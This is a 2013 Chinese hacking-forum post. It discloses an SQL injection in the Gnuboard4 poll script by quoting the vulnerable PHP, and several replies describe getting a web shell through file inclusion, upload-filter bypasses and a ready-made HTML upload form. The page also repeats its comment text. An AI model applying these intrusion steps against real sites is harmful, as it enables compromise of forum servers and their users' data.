T00ls庆五一礼物之二：Gnuboard4 SQL Injection

2013-05-01 02:18:10 126 Rices 9726 2

棒子程序, 棒子国90%的论坛都是用的这屌程序, 我是本着无聊的心情读的, 绝非搞啥韩国数据什么的 = =
因为某SB的一句此程序有GETSHELL, 害的我苦读, 是谁就不说了, 最终注射一堆堆, GETSHELL没读到, 擦

不废话,上代码:

 <? //   \bbs\poll_update.php

include_once("./_common.php");

$po = sql_fetch(" select * from $g4[poll_table] where po_id = '$_POST[po_id]' "); //检查是否存在此投票

if (!$po[po_id]) 

    alert_close("po_id &#44050;&#51060; &#51228;&#45824;&#47196; &#45336;&#50612;&#50724;&#51648; &#50506;&#50520;&#49845;&#45768;&#45796;.");



if ($member[mb_level] < $po[po_level]) 

    alert_close("&#44428;&#54620; $po[po_level] &#51060;&#49345; &#54924;&#50896;&#47564; &#53804;&#54364;&#50640; &#52280;&#50668;&#54616;&#49892; &#49688; &#51080;&#49845;&#45768;&#45796;.");

// &#53216;&#53412;&#50640; &#51200;&#51109;&#46108; &#53804;&#54364;&#48264;&#54840;&#44032; &#50630;&#45796;&#47732;

if (get_cookie("ck_po_id") != $po[po_id]) 

{

    // &#53804;&#54364;&#54664;&#45912; ip&#46308; &#51473;&#50640;&#49436; &#52286;&#50500;&#48376;&#45796;

    $search_ip = false;

    $ips = explode("\n", trim($po[po_ips]));

    for ($i=0; $i<count($ips); $i++) 

    {

        if ($_SERVER[REMOTE_ADDR] == trim($ips[$i]))  //判断当前ip是否已经投过票

        {

            $search_ip = true;

            break;

        }

    }



    // &#53804;&#54364;&#54664;&#45912; &#54924;&#50896;&#50500;&#51060;&#46356;&#46308; &#51473;&#50640;&#49436; &#52286;&#50500;&#48376;&#45796;

    $search_mb_id = false;//&#&53804

    if ($is_member)

    {

        $ids = explode("\n", trim($po[mb_ids]));

        for ($i=0; $i<count($ids); $i++) 

        {

            if ($member[mb_id] == trim($ids[$i]))  //判断当前用户是否已经投过票

            {

                $search_mb_id = true;

                break;

            }

        }

    }



    // &#50630;&#45796;&#47732; &#49440;&#53469;&#54620; &#53804;&#54364;&#54637;&#47785;&#51012; 1&#51613;&#44032; &#49884;&#53412;&#44256; ip, id&#47484; &#51200;&#51109;

    if (!($search_ip || $search_mb_id))  //如果都没有则注射? o(∩_∩)o~~

    {

        $po_ips = $po[po_ips] . $_SERVER[REMOTE_ADDR] . "\n";

        $mb_ids = $po[mb_ids];

        if ($member[mb_id])

            $mb_ids .= $member[mb_id] . "\n";

        sql_query(" update $g4[poll_table] set po_cnt{$gb_poll} = po_cnt{$gb_poll} + 1, po_ips = '$po_ips', mb_ids = '$mb_ids' where po_id = '$po_id' "); //大家都懂了, 你,懂了么????

    }



    if (!$search_mb_id)

        insert_point($member[mb_id], $po[po_point], $po[po_id] . ". " . cut_str($po[po_subject],20) . " &#53804;&#54364; &#52280;&#50668; ", "@poll", $po[po_id], "&#53804;&#54364;");

}



set_cookie("ck_po_id", $po[po_id], 86400 * 15); // &#53804;&#54364; &#53216;&#53412; &#48372;&#47492;&#44036; &#51200;&#51109;



goto_url("./poll_result.php?po_id=$po_id&skin_dir=$skin_dir");

?>

白痴注入, 此程序从一开始就已经全局变量覆盖了, 所以注射还有几个, 就是没有搞到getshell, 留给大牛们读吧~

测试图:

exp用法看下说明文件, 有的站需要登录后才可以注射, 可在exp里设置用户名和密码..

类别 Web安全

关于作者

Rices154篇文章2133篇回复

<form id="frmUpload" enctype="multipart/form-data" action="http://www.127.0.0.1/skin/board/mw.basic/mw.geditor/upload.php" method="post">up <input type="file" name="image" size="50"> <input type="text" name="obj" value="geditor_wr_content"/> <input type="text" name="token" value="348"/> <input type="text" name="work" value="upload"/> <input id="btnUpload" type="submit" value="Upload"> </form>

评论126次

要评论？请先登录或注册

26楼

founsa
2013-5-1 13:55

好东西啊

回复|@ta|踩(0)|顶(0)
25楼

kaerlite
2013-5-1 13:45

好东东哟

回复|@ta|踩(0)|顶(0)
24楼

stream
2013-5-1 13:28

mark

回复|@ta|踩(0)|顶(0)
23楼

junine
2013-5-1 13:25

adm/board_form_update.php 老版本的bo_include_head没有限制，可以直接包含任何文件。新版本的限制了php，html后缀 bo_skin还是没有限制。 %00能断开只能说他功能太多，花里胡哨的

回复|@ta|踩(0)|顶(0)
22楼

折羽鸿鹄
2013-5-1 13:24

学xi了

回复|@ta|踩(0)|顶(0)
21楼

Calm
2013-5-1 12:39

神牛你越来越牛B了。

回复|@ta|踩(0)|顶(0)
20楼

Rices
2013-5-1 12:18

cheditor我看了下下的确可以那样上传不过比较鸡肋还有那个bo_table是谁给发现的太牛逼了这程序一堆include 看都看不完.. 好细心啊

回复|@ta|踩(0)|顶(0)
19楼

Rices
2013-5-1 12:14

4fuckerteam!@#

回复|@ta|踩(0)|顶(0)
18楼

dllall
2013-5-1 11:51

楼主发福利，果断收藏

回复|@ta|踩(0)|顶(0)
17楼

iorange
2013-5-1 11:50

好东西！！！楼主辛苦了！！！

回复|@ta|踩(0)|顶(0)
16楼

testonly
2013-5-1 11:49

太给力了.埃..

回复|@ta|踩(0)|顶(0)
15楼

teardrop
2013-5-1 11:35

7楼很给力

回复|@ta|踩(0)|顶(0)
14楼

r.angel
2013-5-1 11:31

收藏

回复|@ta|踩(0)|顶(0)
13楼

sfsgfr
2013-5-1 11:16

感谢大牛发福利

回复|@ta|踩(0)|顶(0)
12楼
rainer
2013-5-1 10:54
4fuckerteam!@#
回复|@ta|踩(0)|顶(0)
11楼

slip2008
2013-5-1 10:50

看来手中有不少EXP的，自己也好好研读一下。越来越感觉到基础的重要性了。

回复|@ta|踩(0)|顶(0)
10楼

FindExp
2013-5-1 10:41

好文，学xi了…

回复|@ta|踩(0)|顶(0)
9楼

junine
2013-5-1 10:32

Rices- -! 7z的密码多少啊？

回复|@ta|踩(0)|顶(0)
8楼

sunshine
2013-5-1 10:17

膜拜下大牛~

回复|@ta|踩(0)|顶(0)
7楼
junine
2013-5-1 09:27
读出了帐号密码。在后台创建一个文章bo_table列表可以直接包含一个图片。访问http://127.0.0.1/board.php?bo_table=你创建的文章列表得到shell 再者也可以抓包从后台加用户，post用户名可以写成a.php，然后前台上传该用户头像老版本的gnuboard4的编辑器cheditor可以直接上传a.php.JpG JpG要大小写区分开，上传后会自动改名成a.php.txt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 有些版本自带的geditor，
<form id="frmUpload" enctype="multipart/form-data" action="http://www.127.0.0.1/skin/board/mw.basic/mw.geditor/upload.php" method="post">up <input type="file" name="image" size="50"> <input type="text" name="obj" value="geditor_wr_content"/> <input type="text" name="token" value="348"/> <input type="text" name="work" value="upload"/> <input id="btnUpload" type="submit" value="Upload"> </form>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 新版本自带的都有 cheditor5 cheditor5/imageUpload/delete.php?img=xxx 爆路径
回复|@ta|踩(0)|顶(0)

T00ls庆五一礼物之二：Gnuboard4 SQL Injection

关于作者

评论126次

好东西啊

好东东 哟

mark

adm/board_form_update.php 老版本的bo_include_head没有限制，可以直接包含任何文件。 新版本的限制了php，html后缀 bo_skin还是没有限制。 %00能断开 只能说他功能太多，花里胡哨的

学xi了

神牛你越来越牛B了。

cheditor我看了下下的确可以那样上传 不过比较鸡肋 还有那个bo_table是谁给发现的 太牛逼了 这程序一堆include 看都看不完.. 好细心啊

4fuckerteam!@#

楼主发福利，果断收藏

好东西！！！楼主辛苦了！！！

太给力了.埃..

7楼很给力

收藏

感谢大牛发福利

4fuckerteam!@#

看来手中有不少EXP的，自己也好好研读一下。越来越感觉到基础的重要性了。

好文， 学xi了…

Rices- -! 7z的密码多少啊？

膜拜下大牛~

热门文章

安全资讯黑客入侵自行车：无线换档系统存在漏洞

安全资讯Godzilla 无文件后门利用 Atlassian Confluence漏洞 CVE-2023-22527

渗透测试车联网攻击链路图

安全资讯致数千人伤亡的寻呼机为何能爆炸？专家：或黑客入侵致电池过载，或内部被对手安装了爆炸物

最新回复

精华推荐

渗透测试渗透oracle11g

渗透测试postgres注入总结

渗透测试获取访客QQ号示例, 只是其中一种方法

逆向破解某VPN客户端远程下载文件执行模拟逆向分析

代码学习python批量检测爆破phpmyadmin后台的原理与进阶

好东东哟

adm/board_form_update.php 老版本的bo_include_head没有限制，可以直接包含任何文件。新版本的限制了php，html后缀 bo_skin还是没有限制。 %00能断开只能说他功能太多，花里胡哨的

cheditor我看了下下的确可以那样上传不过比较鸡肋还有那个bo_table是谁给发现的太牛逼了这程序一堆include 看都看不完.. 好细心啊

`4fuckerteam!@#`

好文，学xi了…